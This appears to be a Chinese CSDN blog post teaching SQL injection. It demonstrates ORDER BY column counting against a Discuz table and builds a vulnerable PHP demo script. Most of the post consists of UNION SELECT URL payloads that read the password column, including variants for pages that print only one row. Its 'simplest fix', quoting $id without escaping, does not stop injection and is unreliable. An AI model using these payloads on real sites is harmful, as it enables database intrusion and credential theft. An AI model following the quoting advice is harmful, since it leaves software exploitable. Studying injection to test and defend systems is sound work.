SQL注入的几种实用办法

最新推荐文章于 2024-08-01 20:47:16 发布
最新推荐文章于 2024-08-01 20:47:16 发布
阅读量2.6k 收藏
点赞数 1
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w_yunlong/article/details/50425413
版权
一、查询表中包含有多少列: 这里以DISCUZ举例说明,如下 
select * FROM pre_forum_thread ORDER BY 80
返回,Unknown column '80' in 'order clause',这样可以判定一定小于80列,下面再试用 39 
select * FROM pre_forum_thread ORDER BY 39
正常返回了数据,我们判定一定大于等于39,因此只要再试一下40就可以了,这里略过试用,对于开源程序,我完全可以知道他就是有39列。 二、构造参数,读取数据库中的密码 这里以本地创建的一个表为例,前提是参数没有被过滤等操作,表 account 含有三个字段,分别为 id,admin,password 表内包含数据为: 
1 admin 12345678
2 test 134545
创建PHP读取数据库文件 x.php: 
<?php
$link = mysql_connect('127.0.0.1','root','11111111');
mysql_select_db('xtest',$link);
$id = isset($_GET['id'])?$_GET['id']:1;
$sql = "SELECT * FROM `account` WHERE id = " . $id;
$query = mysql_query($sql);
while($row = mysql_fetch_array($query)){
echo $row['admin'] . "<br/>";
}
?>
访问地址 http://127.0.0.1/x.php?id=2 返回数据 test,到这里开始SQL的注入使用,构造参数后的地址 
http://127.0.0.1/x.php?id=2 union select 1,2,3 from `account` where id=2
在返回数据中,发现2被返回了,因此,需要修改这里的2位置为想要的字段内容,比如说 password ,即地址修改为 
http://127.0.0.1/x.php?id=2 union select 1,password,3 from `account` where id=2
执行地址后返回数据: 
test
134545
这样密码就得到了。 当然这里只是简单的举例说明,没有对密码进行MD5加密,如果是MD5加密或其它加密的话,仍然需要接下来的破解,就不是这里主要讲述的内容了。 此问题的解决办法,说一个最简单的吧 ,将SQL语句 $sql = "SELECT * FROM `account` WHERE id = " . $id; 修改为 
$sql = "SELECT * FROM `account` WHERE id = '$id'";
三、在第二个问题中,发现用户是使用了 while将所有数据进行循环得出的数据,如果用户不是循环,而是直接输出了最后一条数据怎么办呢?
这时,只要将参数重新修改,就可以只返回union回来的数据了,如下
http://127.0.0.1/x.php?id=3 union select 1,password,3 from `account` where id=2
因为表里面没有这条id=3的数据,又或者
http://127.0.0.1/x.php?id=2 and 1=2 union select 1,password,3 from `account` where id=2
这里很明显 1和2是不相等的
大事龙
关注
专栏目录
防止SQL注入的五种方法
更南的南z
03-27 1499
防止SQL注入的五种方法一、SQL注入简介二、SQL注入攻击的总体思路三、SQL注入攻击实例四、应对方法 一、SQL注入简介 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 SQL注入是比较常见的网络攻击方式之一,它不是
常见SQL注入手法总结与技巧(一)
sechelper的博客
02-11 1291
SQL注入产生本质,盲注基本原理的详解与技巧,union联合注入演示
.Net防sql注入几种方法
01-01
sql注入的常用方法: 1、服务端对前端传过来的参数值进行类型验证; 2、服务端执行sql,使用参数化传值,而不要使用sql字符串拼接; 3、服务端对前端传过来的数据进行sql关键词过来与检测; 着重记录下服务端进行sql关键词检测: 1、sql关键词检测类: public class SqlInjectHelper:System.Web.UI.Page { private static string StrKeyWord = select|insert|delete|from|count(|drop table|update|truncate|asc(|mid(|char(
sql注入的N种方式
阿星的博客
06-22 4848
1. 介绍了sql注入的union注入、条件注入、堆叠注入、报错注入、时间盲注等方法以及如何进行防御。 2. 介绍了Burp Suite的简单使用
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-01 1617
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库中的一个表schemata表中的一个字段(列),这个字段中记录着所有数据库的名称information_schema数据库中的一个表tables表中的一个字段(对应数据库的名字),这个字段里面记录着所有的数据库的名字tables表中的一个字段(相应数据库中所对应的表名),记录着与table_schema这个字段对应的数据库中对应的表名。
SQL注入几种有用办法
aodiyi6351的博客
07-30 152
一、查询表中包括有多少列: 这里以DISCUZ举例说明,例如以下 select * FROM pre_forum_thread ORDER BY 80 返回,Unknown column '80' in 'order clause'。这样能够判定一定小于80列,以下再试用 39 select * FROM pre_forum_thread ORDER BY 39...
sql注入***的各种注入方法
weixin_34117211的博客
09-25 175
ASP编程门槛很低,新手很容易上路。在一段不长的时间里,新手往往就已经能够编出看来比较完美的动态网站,在功能上,老手能做到的,新手也能够做到。那么新手与老手就没区别了吗?这里面区别可就大了,只不过外行人很难一眼就看出来罢了。在界面的友好性、运行性能以及网站的安全性方面是新手与老手之间区别的三个集中点。而在安全性方面,新手最容易忽略的问题就是SQL注入漏洞的问题。用NBSI 2...
SQL注入类型与技巧
求大佬师傅带
09-01 4558
SQL注入类型与技巧
PHP网站设计中SQL注入的安全防御.pdf
09-19
SQL 注入是一种常见的网络攻击方式,它可以导致网站数据库的安全漏洞,进而导致网站崩溃。因此,在 PHP 网站设计中,数据库安全是一个非常重要的问题。 PHP 是一种广泛应用于网站开发的编程语言,它可以快速地执行...
sql注入知识点
m0_55772907的博客
04-27 3681
1 Sqllab渗透测试天书 Microsoft英文文档 ORDER BY Clause (Transact-SQL) - SQL Server | Microsoft DocsSELECT - ORDER BY Clause (Transact-SQL)https://docs.microsoft.com/en-us/sql/t-sql/queries/select-order-by-clause-transact-sql?view=sql-server-ver152 Iwebsec靶场 判断字
PHP 小心urldecode引发的SQL注入漏洞
10-28
特别地,SQL注入是常见的一种安全漏洞,它允许攻击者非法地对数据库执行操作。而PHP作为流行的服务器端脚本语言,其在处理输入数据时的不当使用可能会导致此类漏洞。文章《PHP 小心urldecode引发的SQL注入漏洞》探讨...
防止SQL注入的5种方法
06-13
防止SQL注入的5种方法,小白分享,不喜勿喷,谢谢,,,
最新ASP通用防SQL注入代码
10-13
例如,它可能包含了以下几种常见策略: 1. **转义特殊字符**:对用户输入进行预处理,将可能导致SQL语句改变含义的特殊字符(如'、"、--、;、--等)转义或替换为安全值。 2. **参数化查询**:使用参数化SQL语句,...
浅析数据库SQL注入及其安全防护.pdf
09-19
为了防止SQL注入,文章提出了几种常见的安全防护方法。首先是使用参数化查询,这种方式可以确保用户输入的数据不会被解释为SQL代码的一部分。其次是字符过滤,对用户输入的数据进行严格的筛选,排除那些可能被解释为...
sql注入几种方法
偏爱mango的小姐姐的博客
04-11 460
1.(简单又有效的方法)PreparedStatement 采用预编译语句集,它内置了处理SQL注入的能力,只要使用它的setXXX方法传值即可。 使用好处: (1).代码的可读性和可维护性. (2).PreparedStatement尽最大可能提高性能. (3).最重要的一点是极大地提高了安全性. 原理: sql注入只对sql语句的准备(编译)过程有破坏作用 而PreparedS...
常见SQL注入的方法
ana35287的博客
11-30 497
WEB安全之SQL注入 引言: 在开发网站的时候,出于安全考虑,需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往给骇客留下了可乘之机。轻则数据遭到泄露,重则服务器被拿下。 1、SQL注入步骤 a)寻找注入点,构造特殊的语句 传入SQL语句可控参数分为两类1. 数字类型,参数不用被引号括起来,如?id=1...
防范SQL注入几种方法 4
weixin_34152820的博客
11-15 208
sql="SELECTIDT_ID,NAMEFROMCategorywhereID="&ID&"ORDERBYxhasc" rs.opensql,conn,1,1四,我自己常用的数据过滤脚本,专利,呵~id=replace(id,”’”,””)Iflen(request(“id”))>8t...
SQL注入方法
weixin_44638133的博客
02-20 323
什么是SQL注入 SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。在这种攻击方式中,恶意代码被插入到字符串中,然后将该字符串
SQL注入绕过技巧:新手实用的避开WAF方法
本文将介绍几种常见的SQL注入绕过技术,包括但不限于: 1. **绕过Web应用防火墙(WAF)**: SQL注入攻击通常会被WAF检测和拦截,但通过巧妙构造查询,可以利用特殊字符或函数绕过这些安全机制。例如,利用加号`+`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值